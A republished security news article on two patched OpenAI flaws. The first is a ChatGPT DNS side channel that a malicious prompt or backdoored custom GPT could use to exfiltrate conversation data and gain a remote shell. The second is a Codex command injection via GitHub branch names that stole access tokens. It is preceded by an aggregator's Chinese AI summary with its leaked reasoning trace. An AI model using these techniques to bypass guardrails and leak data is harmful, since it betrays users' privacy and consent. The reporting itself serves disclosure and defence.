OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability
好的,用户让我帮忙总结一篇关于OpenAI ChatGPT漏洞的文章,控制在100字以内,而且不需要特定的开头。首先,我需要仔细阅读文章内容,抓住主要信息。 文章提到Check Point发现了一个未知的漏洞,允许敏感数据被窃取,用户毫不知情。这个漏洞通过恶意提示利用隐藏的DNS通信路径,绕过了ChatGPT的安全措施。攻击者可以窃取用户消息、文件等信息,甚至建立远程访问。OpenAI已经在2月修复了这个漏洞,并且没有证据显示被恶意利用。 接下来,我需要将这些信息浓缩到100字以内。要确保涵盖关键点:漏洞的存在、攻击方式、影响以及修复情况。同时,语言要简洁明了。 可能的结构是:先说明漏洞及其影响,然后描述攻击手段和后果,最后提到修复和建议。这样既全面又简洁。 现在开始组织语言:“OpenAI ChatGPT被发现存在未知漏洞,允许敏感数据在用户不知情下被窃取。该漏洞利用隐藏的DNS通信路径绕过安全机制,攻击者可获取用户信息并建立远程访问。OpenAI已修复问题,并未发现恶意利用案例。” 检查一下字数是否在100字以内,并且没有使用不必要的开头词。看起来符合要求。 </think> OpenAI ChatGPT被发现存在未知漏洞,允许敏感数据在用户不知情下被窃取。该漏洞利用隐藏的DNS通信路径绕过安全机制,攻击者可获取用户信息并建立远程访问。OpenAI已修复问题,并未发现恶意利用案例。 2026-3-30 18:5:0 Author: thehackernews.com(查看原文) 阅读量:2 收藏

A previously unknown vulnerability in OpenAI ChatGPT allowed sensitive conversation data to be exfiltrated without user knowledge or consent, according to new findings from Check Point.

"A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content," the cybersecurity company said in a report published today. "A backdoored GPT could abuse the same weakness to obtain access to user data without the user's awareness or consent."

Following responsible disclosure, OpenAI addressed the issue on February 20, 2026. There is no evidence that the issue was ever exploited in a malicious context.

While ChatGPT is built with various guardrails to prevent unauthorized data sharing or generate direct outbound network requests, the newly discovered vulnerability bypasses these safeguards entirely by exploiting a side channel originating from the Linux runtime used by the artificial intelligence (AI) agent for code execution and data analysis.

Specifically, it abuses a hidden DNS-based communication path as a "covert transport mechanism" by encoding information into DNS requests to get around visible AI guardrails. What's more, the same hidden communication path could be used to establish remote shell access inside the Linux runtime and achieve command execution.

In the absence of any warning or user approval dialog, the vulnerability creates a security blind spot, with the AI system assuming that the environment was isolated.

As an illustrative example, an attacker could convince a user to paste a malicious prompt by passing it off as a way to unlock premium capabilities for free or improve ChatGPT's performance. The threat gets magnified when the technique is embedded inside custom GPTs, as the malicious logic could be baked into it as opposed to tricking a user into pasting a specially crafted prompt.

"Crucially, because the model operated under the assumption that this environment could not send data outward directly, it did not recognize that behavior as an external data transfer requiring resistance or user mediation," Check Point explained. "As a result, the leakage did not trigger warnings about data leaving the conversation, did not require explicit user confirmation, and remained largely invisible from the user's perspective."

With tools like ChatGPT increasingly embedded in enterprise environments and users uploading highly personal information, vulnerabilities like these underscore the need for organizations to implement their own security layer to counter prompt injections and other unexpected behavior in AI systems.

"This research reinforces a hard truth for the AI era: don't assume AI tools are secure by default," Eli Smadja, head of research at Check Point Research, said in a statement shared with The Hacker News.

"As AI platforms evolve into full computing environments handling our most sensitive data, native security controls are no longer sufficient on their own. Organizations need independent visibility and layered protection between themselves and AI vendors. That's how we move forward safely -- by rethinking security architecture for AI, not reacting to the next incident."

The development comes as threat actors have been observed publishing web browser extensions (or updating existing ones) that engage in the dubious practice of prompt poaching to silently siphon AI chatbot conversations without user consent, highlighting how seemingly harmless add-ons could become a channel for data exfiltration.

"It almost goes without saying that these plugins open the doors to several risks, including identity theft, targeted phishing campaigns, and sensitive data being put up for sale on underground forums," Expel researcher Ben Nahorney said. "In the case of organizations where employees may have unwittingly installed these extensions, they may have exposed intellectual property, customer data, or other confidential information."

Command Injection Vulnerability in OpenAI Codex Leads to GitHub Token Compromise

The findings also coincide with the discovery of a critical command injection vulnerability in OpenAI's Codex, a cloud-based software engineering agent, that could have been exploited to steal GitHub credential data and ultimately compromise multiple users interacting with a shared repository.

"The vulnerability exists within the task creation HTTP request, which allows an attacker to smuggle arbitrary commands through the GitHub branch name parameter," BeyondTrust Phantom Labs researcher Tyler Jespersen said in a report shared with The Hacker News. "This can result in the theft of a victim's GitHub User Access Token – the same token Codex uses to authenticate with GitHub."

The issue, per BeyondTrust, stems from improper input sanitization when processing GitHub branch names during task execution on the cloud. Because of this inadequacy, an attacker could inject arbitrary commands through the branch name parameter in an HTTPS POST request to the backend Codex API, execute malicious payloads inside the agent's container, and retrieve sensitive authentication tokens.

"This granted lateral movement and read/write access to a victim's entire codebase," Kinnaird McQuade, chief security architect at BeyondTrust, said in a post on X. It has been patched by OpenAI as of February 5, 2026, after it was reported on December 16, 2025. The vulnerability affects the ChatGPT website, Codex CLI, Codex SDK, and the Codex IDE Extension.

The cybersecurity vendor said the branch command injection technique could also be extended to steal GitHub Installation Access tokens and execute bash commands on the code review container whenever @codex is referenced in GitHub. 

"With the malicious branch set up, we referenced Codex in a comment on a pull request (PR)," it explained. "Codex then initiated a code review container and created a task against our repository and branch, executing our payload and forwarding the response to our external server."

The research also highlights a growing risk where the privileged access granted to AI coding agents can be weaponized to provide a "scalable attack path" into enterprise systems without triggering traditional security controls.

"As AI agents become more deeply integrated into developer workflows, the security of the containers they run in – and the input they consume – must be treated with the same rigor as any other application security boundary," BeyondTrust said. "The attack surface is expanding, and the security of these environments needs to keep pace."

Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.


文章来源: https://thehackernews.com/2026/03/openai-patches-chatgpt-data.html
如有侵权请联系:admin#unsafe.sh